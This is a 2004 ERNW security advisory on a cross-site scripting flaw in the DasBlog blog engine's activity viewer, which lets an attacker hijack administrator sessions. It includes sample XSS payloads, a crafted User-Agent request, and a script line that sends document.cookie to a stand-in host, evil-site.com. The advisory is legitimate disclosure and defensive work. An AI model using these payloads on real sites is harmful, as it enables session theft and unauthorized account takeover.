ERNW Security Advisory

Cross-Site Scripting Vulnerability in Newtelligence DasBlog 

Author:
Dominick Baier <dbaier@ernw.de>

1. Summary:
A XSS (Cross-Site-Scripting) Vulnerability in DasBlog's Event and Activity
Viewer allows to inject and execute code on the client's machine. This
allows an attacker to transfer the ASP.NET authentication cookie to a server
of his choice. The attacker can use this cookie to log on to DasBlog and
modify blog entries and configuration settings.

2. Severity : Critical

3. Systems affected

DasBlog Versions:
	All

Browsers
	Tested with IE 6 and Firefox 0.93

4. Patch Availability :
http://www.gotdotnet.com/workspaces/releases/viewuploads.aspx?id=77a29128-47
46-4473-b676-e4f1517a1907
Vendor instructions
http://staff.newtelligence.net/clemensv/PermaLink.aspx?guid=69bce168-cb09-4f
09-8d53-f0b97f11b198

5. Details

The Activity and Events Viewer show details about requests that were made to
the blog site. As extra information they show the Referrers, Query Strings
and User Agents of these requests. It is possible to specially malform those
HTTP Headers to inject scripting code. This code gets embedded in the HTML
pages and executed on the client. With specially crafted JavaScript code a
attacker can transfer the ASP.NET Forms Authentication Cookie to a server of
the his choice. While injecting this cookie in a HTTP request to DasBlog he
can authenticate without having to know the username or the password and
enter the administrative area.

Examples of script injections

<script>alert('XSS')</script>
<img%20src="javascript:alert('XSS')">
<img%20src=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a
;alert(&quot;XSS&quot;)>

Leading e.g. to the following HTTP request

GET / HTTP/1.1
User-Agent: <script>alert('xss')</script>
Host: www.victim.com\r\n
Accept: */*


Example of transferring a cookie using JavaScript

<script>document.location='http://www.evil-site.com/cookieEater.aspx?cookie=
'+document.cookie</script>

6. Solution
Install the patch.

7. Time-Line 
The vulnerability was found on the 15th August 2004. The author was
contacted on the same day with a immediate response. The patch has been
provided on the 30.August 2004

8. Disclaimer
 
The informations in this advisory are provided "AS IS" without warranty 
of any kind. In no event shall the authors be liable for any damages 
whatsoever including direct, indirect, incidental, consequential, 
loss of business profits or special damages due to the misuse of any 
information provided in this advisory. 



 

---
Dominick Baier, Dipl. Ing. Informationstechnik (BA)
.NET Architecture / Security Consultant
www.leastprivilege.com

ERNW GmbH / Zähringerstr. 49 / 69115 Heidelberg
Tel. +49 151 16 22 75 56 / Fax. +49 6221 419 008
dbaier@ernw.de / www.ernw.de

PGP (www.ernw.de/keys/dbaier.zip)
7AE0 B3D2 7FFC 7763 E32A  07C2 8B0D F988 DC8D BFB1

X509v3 (www.ernw.de/keys/dbaier@ernw.de.zip)